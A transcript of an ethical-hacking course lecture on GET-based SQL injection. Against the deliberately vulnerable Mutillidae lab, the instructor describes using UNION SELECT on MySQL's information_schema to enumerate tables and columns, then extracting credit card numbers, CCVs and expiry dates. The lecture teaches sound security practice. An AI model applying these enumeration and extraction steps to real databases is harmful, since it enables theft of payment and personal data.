SQLi GET Requests
The course is part of this learning path
In this course, we're going to continue learning about SQL Injections, focusing on GET SQL Injections. They are very similar to POST SQL Injections but we're going to learn about new techniques, new kinds of attacks, and much more.
Hi, we're going to take a little further step in this lecture, and try to get the column names from this UNION SELECT query and try to find the information inside of the tables that we haven't seen yet. So far, we have gathered the database user and version information which is very good. Okay, but we also need the column names in order to see the data inside of that columns as well. So, if there is a vulnerability over here, then we can find it. So, in order to know that, in order to understand that you have to know something and that something is called information schema. So, there is an information schema structure in MySQL or MySQL databases. When you create a database, then you will see an information schema structure where it contains every kind of thing that is going on inside of that database. For example, if you have a WordPress blog or WordPress website in general, you can open your phpMyAdmin. And if you go to MySQL or MySQL section of that phpMyAdmin, you will see that you have this information schema. And of course we have this information schema in this case as well.
So, we need to understand how to reach that information schema and how to use that in order to retrieve some further information. Okay. And we're going to do that actually and we're going to use the same thing that we have been using so far, the UNION SELECT. We're not going to learn anything new in this case. But we're going to select something from the information schema rather than a regular table this time. Okay. So, we're going to try and see what kind of information we can gather from this information schema and use it in our queries. So, that's what we're going to do. So, I'm going to copy this, and rather than saying 1, 2, 3, 4, 5. Of course, we have to say first of all from information_schema, okay, because that's what we're going to query from. But again you have to say .tables at the end. So, there is a table section and there is a column section as well inside of the information schema. First of all, we need to get the table name. So, we can choose what table actually we can read the values from. So far, we haven't been writing SELECT this from that, select things from this. Okay. We have been just doing UNION SELECT.
This time, we're going to select the table_name from information_schema.tables. And I'm putting table name inside of the second column over here because second, third, and fourth column are the columns that we're getting information. So, I'm going to paste this over here and just give some random thing to password. And if I weave the account details, then I will see all the table names in the second column. Okay. And by the way, there might be some cases that you should put null in here. No meaning, nil or no information. Okay. So, in this case, it still works as you can see in the second column, we have the table names. So, we have the characters as collations, columns, key_column_usage, profiling, routines. There's something like tables user privileges. I don't know, we have a lot of tables over here like users, func. Let's see what else we have user, accounts, galaxia something like that. and actually we see the other tiki_blog, tiki_blogs, tiki_calendar. So, this is not even our website. This is not even Matillidae. This is TWiki, but since the user is root. Okay. So, let me go to 10.0.2.5. As you can see there is a TWiki, and DVWA, phpMyAdmin over here. So, we haven't been working with this TWiki, for example. But since the user is root, it has access to all these tables inside of this SQL injection or MySQL in general. Okay.
But we are not interested in any other websites but rather we are interested in the Matillidae and we already know the database name in here as well. So, we can filter this result and see what kind of database names that we have inside of the Metasploitable Mutillidae only. And in real life, maybe you don't have to do this, maybe you actually want to see every kind of detail that you're going to get, but it will make our job very easy if we say where table_schema = owasp10, okay, like that. So, we know that our current database is owasp10 because we have seen it in the database special function. So, I'm going to just put it over here. If I say we do account details, then I'm going to get the results but in a filtered way. So, as you can see we have accounts, blogs_tables, credit_cards, hitlog and pen_test_tools. So, we had these results before, but we can just only see them right now. So, in real life we would see those only because nobody will just put the data within the root user but in this case, the filtering out paid out. Okay. So, I'm going to focus on the credit cards table over here. So, let's see how it's done. I'm going to, of course, get the things from credit cards table right now rather than the information schema. I'm going to change this to information_schema.columns rather than information_schema.tables. And over here I'm just going to say column_name. Okay. And I'm going to change the where close as well. So, rather than saying table schema, I'm going to say table_name = credit_cards. So, it will just get the things from the credit cards and it will filter the results to show us only the column names inside of the credit_cards table. So, if I just do this, I can see that we have ccid. I believe it's credit card ID Or identification credit card number, ccnumber, ccv, and expiration date over here. So, that's good. Now I know the column names and I know the table name as well. Now I can just do what I have to do and just retrieve these information. I have all the things that I need. So I'm going to copy this one more time and paste it below. So, I'm going to change this union select a little bit rather than column name. We can just have like ccid or ccnumber, whatever you want. Actually you know all the column names right now. So, let's go for ccnumber and in the third column, let's go for ccv. Okay. And for the fourth column, let's go for exploration or expiration; however you may want to pronounce it. So, expiration date and that's it. So, over here we have the union select and everything. Let me try to copy this and paste it, and just give a random password over here. It won't matter. And we have an error. Let's see what that error is. It says that CC number is not in the field list. But let's go back. It's ccnumber, I believe I didn't misspell it.
Let's try one more time and see the error over here. No, it's just complaining about the ccnumber. So, there is something wrong with our query in here. we have been doing this from information_schema.columns where table name is credit_cards, which doesn't make sense because we don't have to do that anymore. We just have to get it from credit_cards, right? Why we are doing all of this stuff? So, all you have to do is just get rid of these things. We are not interested in the information_schema.columns anymore or we are not even interested in the table name filter over here as well. We are only interested in getting this column data, column records from the credit cards itself. So, I'm going to delete everything from here. Okay, and just say expiration from credit_cards, yep, that's the way to go. So, let me just try and see if I make this right. I believe so. So, let me just copy this. And let's go back and put it in the name section. Okay. And for the password, I'm just going to give one and here we go another here. Yes say, what does it say? It says the statements have different number of columns. Let's see if we deleted that column over here. it seems so. We have deleted the column five by mistake. Maybe you have seen it as you can see we have four right now.
I'm just going to edit. And finally, I believe that's going to work. I'm just going to copy this and paste it over here, and give some password and here you go. We managed to get the credit card numbers, like this is a credit card number, CCV, expiration date, something like that. Okay. So, this is how you dig deeper. Of course, it changes case by case, maybe it wouldn't be so easy, maybe you would have to you would have to guess some kind of column names or something like that. But in this case we have seen what to do when we have an access to all of this stuff. Okay, so now you know how to work with all of this stuff. That's cool, but that's not enough for SQL injection because again, this is one of the most popular things that you may come across in web. Fantastic. We have to dig deeper. We have to see if we have our heightened or hardened security, how to bypass firewalls or how to bypass filtering in the server as well. We're going to have a section on that in the next, starting with the next lecture.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.